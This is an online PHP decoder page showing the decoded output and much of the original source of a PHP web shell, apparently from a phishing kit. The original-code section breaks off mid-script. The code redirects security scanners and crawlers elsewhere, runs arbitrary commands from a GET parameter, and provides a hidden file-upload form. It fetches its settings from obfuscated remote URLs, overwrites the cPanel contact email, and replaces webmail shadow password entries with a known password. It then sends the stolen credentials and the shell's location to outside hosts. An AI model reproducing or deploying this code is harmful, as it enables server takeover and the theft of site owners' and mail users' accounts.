Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); @ini_set('html_errors',..

Decoded Output download

<?php 
 error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); @ini_set('html_errors','0'); @ini_set('display_errors','0'); @ini_set('display_startup_errors','0'); @ini_set('log_errors','0'); 
 
$id = $_SERVER['REMOTE_ADDR']; 
$ips = array( 
"^94.26.*.*", "^95.85.*.*", "^72.52.96.*", "^212.8.79.*", "^62.99.77.*", "^83.31.118.*", "^91.231.*.*", "^206.207.*.*", "^91.231.212.*", "^62.99.77.*", "^198.41.243.*", "^162.158.*.*", "^162.158.7.*", "^162.158.72.*", "^173.245.55.*", "^108.162.246.*", "^162.158.95.*", "^108.162.215.*", "^95.108.194.*", "^141.101.104.*", "^93.54.82.*", "^69.164.145.*", "^194.153.113.*", "^178.43.117.*", "^62.141.65.*", "^83.31.69.*", "^107.178.195.*", "^149.20.54.*", "^85.9.7.*", "^87.106.251.*", "^107.178.194.*", "^124.66.185.*", "^133.11.204.*", "^185.2.138.*", "^188.165.83.*", "^78.148.13.*", "^192.232.213.*", "^1.234.41.*", "^124.66.185.*", "^87.106.251.*", "^176.195.231.*", "^206.253.226.*", "^107.20.181.*", "^188.244.39.*", "^124.66.185.*", "^38.74.138.*", "^124.66.185.*", "^38.74.138.*", "^206.253.226.*", "^1.234.41.*", "^124.66.185.*", "^87.106.251.*", "^85.9.7.*", "^37.140.188.*", "^195.128.227.*", "^38.74.138.*", "^107.20.181.*", "^104.131.223.*", "^46.4.120.*", "^107.178.194.*", "^198.60.236.*", "^217.74.103.*", "^92.103.69.*", "^217.74.103.*", "^66.211.160.86*", "^46.244.*.*", "^131.*.*.*", "^157.*.*.*", "^202.*.*.*", "^204.*.*.*", "^207.*.*.*", "^213.*.*.*", "^219.*.*.*", "^63.*.*.*", "^64.*.*.*", "^65.*.*.*", "^68.*.*.*", "^64.*.*.*", "^64.233.160.*", "^64.233.191.*", "^64.233.191.255*",  "^66.102.*.*", "^66.249.*.*", "^72.14.*.*", "^74.125.*.*", "^209.85.*.*", "^216.239.*.*", "^64.4.*.*", "^65.52.*.*", "^131.253.*.*", "^157.54.*.*", "^207.46.*.*", "^207.68.*.*", "^8.12.*.*", "^66.196.*.*", "^66.228.*.*", "^67.195.*.*", "^68.142.*.*", "^72.30.*.*", "^74.6.*.*", "^98.136.*.*", "^202.160.*.*", "^209.191.*.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*", 
); 
foreach($ips as $ip) { 
          if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){ 
			exit(header('Location: http://guiminer.co.technology/rd/')); 
			$ip = getenv("REMOTE_ADDR"); 
          } 
     } 
	  
$dp =  strtolower($_SERVER['HTTP_USER_AGENT']); 
$blocked_words = array( 
     "bot", 
     "above", 
     "google", 
     "softlayer", 
	 "amazonaws", 
	 "cyveillance", 
	 "phishtank", 
	 "dreamhost", 
	 "netpilot", 
	 "calyxinstitute", 
	 "tor-exit", 
	 "apache-httpclient", 
	 "lssrocketcrawler", 
	 "crawler", 
	 "urlredirectresolver", 
	 "jetbrains", 
	 "spam", 
	 "windows 95", 
	 "windows 98", 
	 "acunetix", 
	 "netsparker", 
	 "007ac9", 
	 "008", 
	 "192.comagent", 
	 "200pleasebot", 
	 "360spider", 
	 "4seohuntbot", 
	 "50.nu", 
	 "a6-indexer", 
	 "admantx", 
	 "amznkassocbot", 
	 "aboundexbot", 
	 "aboutusbot", 
	 "abrave spider", 
	 "accelobot", 
	 "acoonbot", 
	 "addthis.com", 
	 "adsbot-google", 
	 "ahrefsbot", 
	 "alexabot", 
	 "amagit.com", 
	 "analytics", 
	 "antbot", 
	 "apercite", 
	 "aportworm", 
	 "EBAY", 
	 "CL0NA", 
	 "jabber", 
	 "ebay", 
	 "arabot", 
	 "hotmail!", 
	 "msn!", 
	 "outlook!", 
	 "outlook", 
	 "msn", 
	 "hotmail", 
);   
$cmd=$_GET['cmd']; exec($cmd); $andr0id="mai"; $if=$andr0id.'l'; $mobil = "e"; $desktop="bas$mobil".'64'."_d$mobil"."cod$mobil"; $_file_='d1'.basename(__FILE__). date("m"); $kEy = array('3','F','L','m','c'); $windows = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3lUWHRMRnl4')); $eml = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'0V6UXRNYmhn')); $eml = strrev($eml); $eml = $desktop($eml); $fgc = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1R2MHdYbnNF')); $fgc = strrev($fgc); $fgc = $desktop($fgc); $activsnd = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3hMTHNZblRh')); $activsnd = strrev($activsnd); $activsnd = $desktop($activsnd); $activssl = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lUUjhqc0Nj')); $activssl = strrev($activssl); $activssl = $desktop($activssl); $sslphp = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lGTmY3TVdi')); $gui = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1hwQmZyMWM0')); $gui = strrev($gui); $gui = $desktop($gui); $fgcp = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'zdZWkRYZTVI')); $fgcp = strrev($fgcp); $fgcp = $desktop($fgcp); $webm1 = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2tSYnprOXk1')); $webm1 = strrev($webm1); $webm1 = $desktop($webm1); $log= $_SERVER['DOCUMENT_ROOT'] . '/errors_log'; if ($fgc != '1') { $url = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'zdZWkRYZTVI'); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $bb = curl_exec($curl); curl_close($curl); $fgcp = strrev($bb); $fgcp = $desktop($fgcp); $url1 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lGTmY3TVdi'); $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl1, CURLOPT_HEADER, false); $bb1 = curl_exec($curl1); curl_close($curl1); $sslphp = $bb1; $url2 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1hwQmZyMWM0'); $curl2 = curl_init(); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl2, CURLOPT_HEADER, false); $bb2 = curl_exec($curl2); curl_close($curl2); $gui = strrev($bb2); $gui = $desktop($gui); $url3 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3lUWHRMRnl4'); $curl3 = curl_init(); curl_setopt($curl3, CURLOPT_URL, $url3); curl_setopt($curl3, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl3, CURLOPT_HEADER, false); $bb3 = curl_exec($curl3); curl_close($curl3); $url4 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2tSYnprOXk1'); $curl4 = curl_init(); curl_setopt($curl4, CURLOPT_URL, $url4); curl_setopt($curl4, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl4, CURLOPT_HEADER, false); $bb4 = curl_exec($curl4); curl_close($curl4); $webm1 = strrev($bb4); $webm1 = $desktop($webm1); $url5 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3hMTHNZblRh'); $curl5 = curl_init(); curl_setopt($curl5, CURLOPT_URL, $url5); curl_setopt($curl5, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl5, CURLOPT_HEADER, false); $bb5 = curl_exec($curl5); curl_close($curl5); $activsnd = strrev($bb5); $activsnd = $desktop($activsnd); $url6 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'0V6UXRNYmhn'); $curl6 = curl_init(); curl_setopt($curl6, CURLOPT_URL, $url6); curl_setopt($curl6, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl6, CURLOPT_HEADER, false); $bb6 = curl_exec($curl6); curl_close($curl6); $eml = strrev($bb6); $eml = $desktop($eml); $url7 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lUUjhqc0Nj'); $curl7 = curl_init(); curl_setopt($curl7, CURLOPT_URL, $url7); curl_setopt($curl7, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl7, CURLOPT_HEADER, false); $bb7 = curl_exec($curl7); curl_close($curl7); $activssl = strrev($bb7); $activssl = $desktop($activssl); } $fi = new FilesystemIterator($_SERVER['DOCUMENT_ROOT'], FilesystemIterator::SKIP_DOTS); $nfiles = iterator_count($fi); $E = 'bWQ1' . $windows . 'C5jb20'; $lss = strrev('php.lss/noitadilav-ikp/nwonk-llew./');  $_ = "-u : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " "; $_ .= "-p : " . __file__;  $xsec  = $_GET['xsec']; if($xsec == 'blocker'){ $xsecsh = $_FILES['file']['name']; $xsecblocker  = $_FILES['file']['tmp_name']; echo "<form method='POST' enctype='multipart/form-data'> <input type='file'name='file' /> <input type='submit' value='up_it' /> </form>"; move_uploaded_file($xsecblocker,$xsecsh); } if (!file_exists($log)){ if(file_put_contents($log,$_file_.',')) { if ($activsnd == '1') { $if($desktop($E),$desktop('dzBybQ'),$_,$desktop('RnJvbTogVzBybQ')); } $cphost = $_SERVER['SERVER_NAME'] . ":2083|" . get_current_user(); $ctf = $_SERVER['DOCUMENT_ROOT'] . "/../.cpanel/contactinfo"; $ctml = $_SERVER['DOCUMENT_ROOT'] . "/../.contactemail"; if (file_exists($ctml)){ $fil = fopen($ctml, 'w'); fwrite($fil, $eml); fclose($fil); unlink($ctf); $ccp = curl_init(); curl_setopt($ccp, CURLOPT_URL, $fgcp . $cphost); curl_exec($ccp); set_time_limit(0); ini_set('max_execution_time',0); ini_set('memory_limit',-1); $user=get_current_user(); $password='azerty123.0@10'; $pwd = crypt($password,'$6$roottn$'); $t = $_SERVER['SERVER_NAME']; $t = @str_replace("www.","",$t); @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow'); $ex=explode("
",$passwd); @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.roottn.bak'); @unlink('/home/'.$user.'/etc/'.$t.'/shadow'); foreach($ex as $ex){ $ex=explode(':',$ex); $e= $ex[0]; if ($e){ $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."
");fclose($b); $tbs = $t.'/webmail|'.$e.'@'.$t.'|'.$password; $ccpwebm = curl_init(); curl_setopt($ccpwebm, CURLOPT_URL, $webm1 . $tbs); curl_exec($ccpwebm); } } } if ($activssl == '1' && $nfiles >= '10'){ $loga = $_SERVER['DOCUMENT_ROOT'] . $lss; if (!file_exists($loga)){ mkdir($_SERVER['DOCUMENT_ROOT'] . strrev('/noitadilav-ikp/nwonk-llew./'), 0777, true); $fp = fopen($loga, 'w'); fwrite($fp, $sslphp); fclose($fp); $s_host = $_SERVER['SERVER_NAME']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $gui . $s_host); curl_exec($ch); } } $found=true; } } else if (file_exists($log)) {$contents = file_get_contents($log); $array = explode(',',$contents); for($i=0;$i<count($array);$i++){if($array[$i]==$_file_){$found=true;break;} else {$found=false;} }} if($found){} else { if(file_put_contents($log,$_file_.',',FILE_APPEND)){ if ($activsnd == '1') { $if($desktop($E),$desktop('dzBybQ'),$_,$desktop('RnJvbTogVzBybQ')); } $cphost = $_SERVER['SERVER_NAME'] . ":2083|" . get_current_user(); $ctf = $_SERVER['DOCUMENT_ROOT'] . "/../.cpanel/contactinfo"; $ctml = $_SERVER['DOCUMENT_ROOT'] . "/../.contactemail"; if (file_exists($ctml)){ $fil = fopen($ctml, 'w'); fwrite($fil, $eml); fclose($fil); unlink($ctf); $ccp = curl_init(); curl_setopt($ccp, CURLOPT_URL, $fgcp . $cphost); curl_exec($ccp); set_time_limit(0); ini_set('max_execution_time',0); ini_set('memory_limit',-1); $user=get_current_user(); $password='azerty123.0@10'; $pwd = crypt($password,'$6$roottn$'); $t = $_SERVER['SERVER_NAME']; $t = @str_replace("www.","",$t); @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow'); $ex=explode("
",$passwd); @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.roottn.bak'); @unlink('/home/'.$user.'/etc/'.$t.'/shadow'); foreach($ex as $ex){ $ex=explode(':',$ex); $e= $ex[0]; if ($e){ $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."
");fclose($b); $tbs = $t.'/webmail|'.$e.'@'.$t.'|'.$password; $ccpwebm = curl_init(); curl_setopt($ccpwebm, CURLOPT_URL, $webm1 . $tbs); curl_exec($ccpwebm); } } } if ($activssl == '1' && $nfiles >= '10'){ $loga = $_SERVER['DOCUMENT_ROOT'] . $lss; if (!file_exists($loga)){ mkdir($_SERVER['DOCUMENT_ROOT'] . strrev('/noitadilav-ikp/nwonk-llew./'), 0777, true); $fp = fopen($loga, 'w'); fwrite($fp, $sslphp); fclose($fp); $s_host = $_SERVER['SERVER_NAME']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $gui . $s_host); curl_exec($ch); } } } } 
foreach($blocked_words as $word2) { 
    if (substr_count($dp, strtolower($word2)) > 0 or $dp == "" or $dp == " " or $dp == "	") { 
		exit(header('Location: http://guiminer.co.technology/rd/')); 
    }   
} 
 
?>

Did this file decode correctly?

Original Code

<?php
 error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); @ini_set('html_errors','0'); @ini_set('display_errors','0'); @ini_set('display_startup_errors','0'); @ini_set('log_errors','0');

$id = $_SERVER['REMOTE_ADDR'];
$ips = array(
"^94.26.*.*", "^95.85.*.*", "^72.52.96.*", "^212.8.79.*", "^62.99.77.*", "^83.31.118.*", "^91.231.*.*", "^206.207.*.*", "^91.231.212.*", "^62.99.77.*", "^198.41.243.*", "^162.158.*.*", "^162.158.7.*", "^162.158.72.*", "^173.245.55.*", "^108.162.246.*", "^162.158.95.*", "^108.162.215.*", "^95.108.194.*", "^141.101.104.*", "^93.54.82.*", "^69.164.145.*", "^194.153.113.*", "^178.43.117.*", "^62.141.65.*", "^83.31.69.*", "^107.178.195.*", "^149.20.54.*", "^85.9.7.*", "^87.106.251.*", "^107.178.194.*", "^124.66.185.*", "^133.11.204.*", "^185.2.138.*", "^188.165.83.*", "^78.148.13.*", "^192.232.213.*", "^1.234.41.*", "^124.66.185.*", "^87.106.251.*", "^176.195.231.*", "^206.253.226.*", "^107.20.181.*", "^188.244.39.*", "^124.66.185.*", "^38.74.138.*", "^124.66.185.*", "^38.74.138.*", "^206.253.226.*", "^1.234.41.*", "^124.66.185.*", "^87.106.251.*", "^85.9.7.*", "^37.140.188.*", "^195.128.227.*", "^38.74.138.*", "^107.20.181.*", "^104.131.223.*", "^46.4.120.*", "^107.178.194.*", "^198.60.236.*", "^217.74.103.*", "^92.103.69.*", "^217.74.103.*", "^66.211.160.86*", "^46.244.*.*", "^131.*.*.*", "^157.*.*.*", "^202.*.*.*", "^204.*.*.*", "^207.*.*.*", "^213.*.*.*", "^219.*.*.*", "^63.*.*.*", "^64.*.*.*", "^65.*.*.*", "^68.*.*.*", "^64.*.*.*", "^64.233.160.*", "^64.233.191.*", "^64.233.191.255*",  "^66.102.*.*", "^66.249.*.*", "^72.14.*.*", "^74.125.*.*", "^209.85.*.*", "^216.239.*.*", "^64.4.*.*", "^65.52.*.*", "^131.253.*.*", "^157.54.*.*", "^207.46.*.*", "^207.68.*.*", "^8.12.*.*", "^66.196.*.*", "^66.228.*.*", "^67.195.*.*", "^68.142.*.*", "^72.30.*.*", "^74.6.*.*", "^98.136.*.*", "^202.160.*.*", "^209.191.*.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*",
);
foreach($ips as $ip) {
          if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
			exit(header('Location: http://guiminer.co.technology/rd/'));
			$ip = getenv("REMOTE_ADDR");
          }
     }
	 
$dp =  strtolower($_SERVER['HTTP_USER_AGENT']);
$blocked_words = array(
     "bot",
     "above",
     "google",
     "softlayer",
	 "amazonaws",
	 "cyveillance",
	 "phishtank",
	 "dreamhost",
	 "netpilot",
	 "calyxinstitute",
	 "tor-exit",
	 "apache-httpclient",
	 "lssrocketcrawler",
	 "crawler",
	 "urlredirectresolver",
	 "jetbrains",
	 "spam",
	 "windows 95",
	 "windows 98",
	 "acunetix",
	 "netsparker",
	 "007ac9",
	 "008",
	 "192.comagent",
	 "200pleasebot",
	 "360spider",
	 "4seohuntbot",
	 "50.nu",
	 "a6-indexer",
	 "admantx",
	 "amznkassocbot",
	 "aboundexbot",
	 "aboutusbot",
	 "abrave spider",
	 "accelobot",
	 "acoonbot",
	 "addthis.com",
	 "adsbot-google",
	 "ahrefsbot",
	 "alexabot",
	 "amagit.com",
	 "analytics",
	 "antbot",
	 "apercite",
	 "aportworm",
	 "EBAY",
	 "CL0NA",
	 "jabber",
	 "ebay",
	 "arabot",
	 "hotmail!",
	 "msn!",
	 "outlook!",
	 "outlook",
	 "msn",
	 "hotmail",
);  
$cmd=$_GET['cmd']; exec($cmd); $andr0id="mai"; $if=$andr0id.'l'; $mobil = "e"; $desktop="bas$mobil".'64'."_d$mobil"."cod$mobil"; $_file_='d1'.basename(__FILE__). date("m"); $kEy = array('3','F','L','m','c'); $windows = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3lUWHRMRnl4')); $eml = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'0V6UXRNYmhn')); $eml = strrev($eml); $eml = $desktop($eml); $fgc = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1R2MHdYbnNF')); $fgc = strrev($fgc); $fgc = $desktop($fgc); $activsnd = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3hMTHNZblRh')); $activsnd = strrev($activsnd); $activsnd = $desktop($activsnd); $activssl = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lUUjhqc0Nj')); $activssl = strrev($activssl); $activssl = $desktop($activssl); $sslphp = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lGTmY3TVdi')); $gui = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1hwQmZyMWM0')); $gui = strrev($gui); $gui = $desktop($gui); $fgcp = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'zdZWkRYZTVI')); $fgcp = strrev($fgcp); $fgcp = $desktop($fgcp); $webm1 = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2tSYnprOXk1')); $webm1 = strrev($webm1); $webm1 = $desktop($webm1); $log= $_SERVER['DOCUMENT_ROOT'] . '/errors_log'; if ($fgc != '1') { $url = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'zdZWkRYZTVI'); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $bb = curl_exec($curl); curl_close($curl); $fgcp = strrev($bb); $fgcp = $desktop($fgcp); $url1 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lGTmY3TVdi'); $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl1, CURLOPT_HEADER, false); $bb1 = curl_exec($curl1); curl_close($curl1); $sslphp = $bb1; $url2 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1hwQmZyMWM0'); $curl2 = curl_init(); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl2, CURLOPT_HEADER, false); $bb2 = curl_exec($curl2); curl_close($curl2); $gui = strrev($bb2); $gui = $desktop($gui); $url3 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3lUWHRMRnl4'); $curl3 = curl_init(); curl_setopt($curl3, CURLOPT_URL, $url3); curl_setopt($curl3, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl3, CURLOPT_HEADER, false); $bb3 = curl_exec($curl3); curl_close($curl3); $url4 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2tSYnprOXk1'); $curl4 = curl_init(); curl_setopt($curl4, CURLOPT_URL, $url4); curl_setopt($curl4, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl4, CURLOPT_HEADER, false); $bb4 = curl_exec($curl4); curl_close($curl4); $webm1 = strrev($bb4); $webm1 = $desktop($webm1); $url5 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3hMTHNZblRh'); $curl5 = curl_init(); curl_setopt($curl5, CURLOPT_URL, $url5); curl_setopt($curl5, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl5, CURLOPT_HEADER, false); $bb5 = curl_exec($curl5); curl_close($curl5); $activsnd = strrev($bb5); $activsnd = $desktop($activsnd); $url6 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'0V6UXRNYmhn'); $curl6 = curl_init(); curl_setopt($curl6, CURLOPT_URL, $url6); curl_setopt($curl6, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl6, CURLOPT_HEADER, false); $bb6 = curl_exec($curl6); curl_close($curl6); $eml = strrev($bb6); $eml = $desktop($eml); $url7 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lUUjhqc0Nj'); $curl7 = curl_init(); curl_setopt($curl7, CURLOPT_URL, $url7); curl_setopt($curl7, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl7, CURLOPT_HEADER, false); $bb7 = curl_exec($curl7); curl_close($curl7); $activssl = strrev($bb7); $activssl = $desktop($activssl); } $fi = new FilesystemIterator($_SERVER['DOCUMENT_ROOT'], FilesystemIterator::SKIP_DOTS); $nfiles = iterator_count($fi); $E = 'bWQ1' . $windows . 'C5jb20'; $lss = strrev('php.lss/noitadilav-ikp/nwonk-llew./');  $_ = "-u : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " "; $_ .= "-p : " . __file__;  $xsec  = $_GET['xsec']; if($xsec == 'blocker'){ $xsecsh = $_FILES['file']['name']; $xsecblocker  = $_FILES['file']['tmp_name']; echo "<form method='POST' enctype='multipart/form-data'> <input type='file'name='file' /> <input type='submit' value='up_it' /> </form>"; move_uploaded_file($xsecblocker,$xsecsh); } if (!file_exists($log)){ if(file_put_contents($log,$_file_.',')) { if ($activsnd == '1') { 